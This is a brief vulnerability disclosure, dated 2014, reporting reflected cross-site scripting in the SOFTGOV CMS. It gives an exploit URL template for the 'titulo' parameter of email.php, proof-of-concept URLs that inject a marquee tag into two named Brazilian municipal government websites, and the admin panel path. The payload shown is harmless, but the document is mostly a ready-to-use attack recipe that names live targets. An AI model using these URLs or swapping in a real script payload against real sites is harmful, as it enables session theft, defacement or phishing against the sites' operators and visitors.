[+] Cross Site Scripting on CMS SOFTGOV
[+] Date: 23/04/2014
[+] Risk: LOW
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.softgov.com.br/sg/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: email.php
[+] Exploit : http://host/estrutura/textounico/email.php?link=null%3Fpagina=t1&id=28&var=noticia&titulo=[XSS]
[+] PoC : http://www.camarariopardo.rs.gov.br/estrutura/textounico/email.php?link=null%3Fpagina=t1&id=28&var=noticia&titulo=<marquee>Felipe Andrian Peixoto</marquee>
          http://www.camarauruana.go.gov.br/estrutura/textounico/email.php?link=null%3Fpagina=t1&id=28&var=noticia&titulo=<marquee>Felipe Andrian Peixoto</marquee>
[+] Admin Page: http://host/painel